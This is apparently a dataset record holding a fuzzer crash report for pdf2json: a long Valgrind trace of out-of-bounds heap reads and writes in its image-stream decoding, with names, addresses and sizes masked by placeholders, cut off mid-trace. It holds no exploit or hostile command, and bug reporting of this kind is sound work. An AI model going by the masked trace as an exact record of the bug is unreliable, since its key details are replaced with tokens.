  51514. "description": "SEGV on APITAG Hi, Our fuzzer found a crash due to an invalid write on the function APITAG (the latest commit b NUMBERTAG b NUMBERTAG on master version NUMBERTAG APITAG URLTAG Valgrind says: ~~~ valgrind pdf2json APITAG /dev/null NUMBERTAG Memcheck, a memory error detector NUMBERTAG Copyright (C NUMBERTAG and GNU GPL'd, by Julian Seward et al NUMBERTAG Using Valgrind NUMBERTAG and APITAG rerun with h for copyright info NUMBERTAG Command: ./pdf2json APITAG /dev/null NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG bc is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG bc is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG B: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG bc is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG be is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG be is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG F5: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG be is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Error NUMBERTAG Bad white code NUMBERTAG b) in APITAG stream NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG a is NUMBERTAG bytes before a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG AF NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CDB8: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BC1: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG a is NUMBERTAG bytes before a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG AF NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CDB8: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BC1: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Error NUMBERTAG APITAG row is wrong length NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG CF: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG a is NUMBERTAG bytes before a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG AF NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CDB8: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BC1: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid write of size NUMBERTAG at NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG a is NUMBERTAG bytes before a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2E0EF: operator new(unsigned long) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG AF NUMBERTAG APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG CDB8: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG BC1: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BD NUMBERTAG APITAG , int, int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A: main APITAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG bc is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C4C: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG bc is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG AFF: APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG FA NUMBERTAG APITAG int, Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A9: APITAG , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG Invalid read of size NUMBERTAG at NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG ADDC: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG A: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG (in PATHTAG NUMBERTAG by NUMBERTAG FD: APITAG ) (in PATHTAG NUMBERTAG by NUMBERTAG C NUMBERTAG APITAG (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , unsigned char , APITAG int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG Gfx::go(int) (in PATHTAG NUMBERTAG by NUMBERTAG APITAG , int) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG E: APITAG , double, double, int, int, int, int, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG A NUMBERTAG A: APITAG , double, double, int, int, int, Links , int, Catalog , int ( )(void ), void ) (in PATHTAG NUMBERTAG by NUMBERTAG BCBD: APITAG , int, double, double, int, int, int, int, int ( )(void ), void ) (in PATHTAG NUMBERTAG Address NUMBERTAG b NUMBERTAG bc is NUMBERTAG bytes after a block of size NUMBERTAG alloc'd NUMBERTAG at NUMBERTAG C2DB8F: malloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmalloc (in PATHTAG NUMBERTAG by NUMBERTAG E NUMBERTAG gmallocn (in PATHTAG NUMBERTAG by NUMBERTAG F: APITAG , int, int, int, int, int, int, int) (in PATHTAG NUMBERTAG by NUMBERTAG CE NUMBERTAG APITAG , Stream , Object ) (in PATHTAG NUMBERTAG by NUMBERTAG C6AF: APITAG ) (in PATHTAG 